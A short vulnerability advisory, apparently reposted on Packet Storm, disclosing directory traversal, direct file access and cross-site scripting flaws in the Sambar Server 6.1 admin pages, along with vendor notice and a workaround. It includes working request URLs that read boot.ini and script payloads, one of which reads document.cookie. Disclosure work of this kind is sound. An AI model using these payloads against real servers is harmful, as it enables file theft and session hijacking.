Sambar Server version 6.x has been found susceptible to directory traversal, direct file access, and cross site scripting attacks
5467d07e39bee02ec5cbf79f55db0f1dbd67f3df5968037eed86cdcbd00981a4Sambar Proxy Multible Vulnerabilities
=====================================
I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which allow the
sambar admin access to files outside of the application directories.
Since Sambar comes with no password for admin as default, it might be a security problem,
if administration of Sambar proxy is allowed from any IP (by default it is restricted to 127.0.0.1!).
In Addition, i found some XSS.
Directory Traversal
===================
http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini
See: www.oliverkarow.de/research/sambar_trav.GIF
Direct File Access
==================
http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y
Cross Site Scripting
====================
http://localhost/sysadmin/system/show.asp?show=<script>alert("oops")</script>
http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>
Version
=======
I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other versions/platforms may also be affected.
Vendor
======
www.sambar.com
Vendor is informed, and is fixing this vulns in the next release.
Workaround
==========
Set a password for admin account and restrict administration to localhost (default).
Credits
=======
15.05.2004 www.oliverkarow.de
www.oliverkarow.de/research/sambar.txt
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed